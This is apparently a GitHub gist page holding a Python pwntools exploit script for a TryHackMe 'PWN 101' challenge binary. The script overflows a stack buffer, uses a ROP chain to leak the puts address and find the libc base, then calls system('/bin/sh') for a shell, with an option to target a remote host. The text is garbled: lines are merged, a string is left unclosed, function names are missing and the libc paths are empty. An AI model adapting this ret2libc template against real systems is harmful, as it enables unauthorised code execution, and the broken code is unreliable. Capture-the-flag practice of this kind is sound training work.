Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
THM PWN 101 - Challenge 9 (optimized using pwntools native ROP() chains)
#!/bin/env python3
import sys
from pwn import *
exe = "./pwn109.pwn109"
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
def start(argv=[], *a, **kw):
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE:
return remote(sys.argv[1], sys.argv[2], *a, **kw)
return process([exe] + argv, *a, **kw)
# Specific your GDB script here for debugging
gdbscript = '''
offset = 32 + 8 # Adjust for buffer + RBP "Starting exploit run..." )
p = start() "Building ROP chain to calc libc addr..." )
rop = ROP(elf) # Stack align with extra 'ret' to deal with movaps issue
rop.puts( "Sending payload..." )
p.sendlineafter( b"Go ahead \xf0\x9f\x98\x8f", fit({offset:rop.chain()}) )
puts_str = p.recvline()
puts_addr = u64(puts_str.strip().ljust(8, b"\x00")) "Puts is at %#x", puts_addr )
if args.REMOTE:
libc = ELF("", checksec=False)
libc = ELF("", checksec=False)
libc.address = puts_addr - libc.sym.puts "libc base is at %#x", libc.address ) "Building ROP chain to exec shell..." )
rop = ROP(libc) # Stack align with extra 'ret' to deal with movaps issue
rop.system(next('/bin/sh')), 0, 0) "Sending payload to get shell..." )
p.sendlineafter( b"Go ahead \xf0\x9f\x98\x8f", fit({offset:rop.chain()}) )
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment